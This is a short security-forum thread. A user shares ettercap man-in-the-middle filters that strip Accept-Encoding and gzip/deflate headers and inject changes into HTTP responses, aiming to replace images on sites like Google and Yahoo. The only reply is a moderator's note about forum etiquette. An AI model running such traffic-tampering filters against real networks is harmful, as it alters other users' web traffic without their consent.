Results 1 to 3 of 3

Thread: ettercap filter not working for google or yahoo

  1. #1
    Just burned his ISO
    Join Date
    Sep 2006
    Posts
    16

    Default

    I'm having issues with ettercap and sites using gzip, deflate.

    I am using a basic filter
    if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Nothing!");
    }
    }

    if (ip.proto == TCP && tcp.src == 80) {
    if (search(DATA.data, "<title>")) {
    replace("</title>", "!!!</title>");
    msg("script injected");
    }}
    It's like the page gets redirected.
    If I look in firefox firebug for HTML I see
    "Failed to load source for: hxxp://xxx.yahoo.com/"

    I tried messing with removing javascript thinking maybe the site was validating but that didn't seem to work

    Also tried other filters like
    if (search(DATA.data, "gzip")) {
    replace("gzip", " "); # note: four spaces in the replacement string
    msg("whited out gzip\n");
    }
    if (search(DATA.data, "deflate")) {
    replace("deflate", " "); # note: seven spaces in the replacement string
    msg("whited out deflate\n");
    }
    if (search(DATA.data, "gzip,deflate")) {
    replace("gzip,deflate", " "); # note: twelve spaces in the replacement string
    msg("whited out deflate and gzip\n");
    }
    Also tried manipulating
    gzip;q=0,deflate;q=0
    but couldn't get the size the same.


    I've read around in the backtrack forums and external and no one seems to have issues with this. What am I missing.

    If I do an if gzip,deflate do nothing else do something
    All the other pages will get the title/image changes and google/yahoo just work normally.

    On a side note it's IE7 that gives the error page (client error page). Firefox looks to show the web page but it's like the page jammed. I have no script not sure if that's doing anything.

    Also notice where firefox and ie treat the gzip,deflate or gzip, deflate differently....

    Trying to get image replacement working across the board but having a hard time with the chunked/gzip sites like amazon, yahoo, google.
    Facebook and ebay will work if I do the Accept-Encoding manipulation in the DECODED.data but it breaks amazon, yahoo, google etc.

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Use the edit button instead of making multiple consecutive posts.
    Thanks.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  3. #3
    Just burned his ISO
    Join Date
    Sep 2006
    Posts
    16

    Default

    will do. They were at seperate points in time. Wanted people to realize I was digging/working on it. I know you don't get an answer from the forums unless you've put in the effort on figuring it out yourself

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •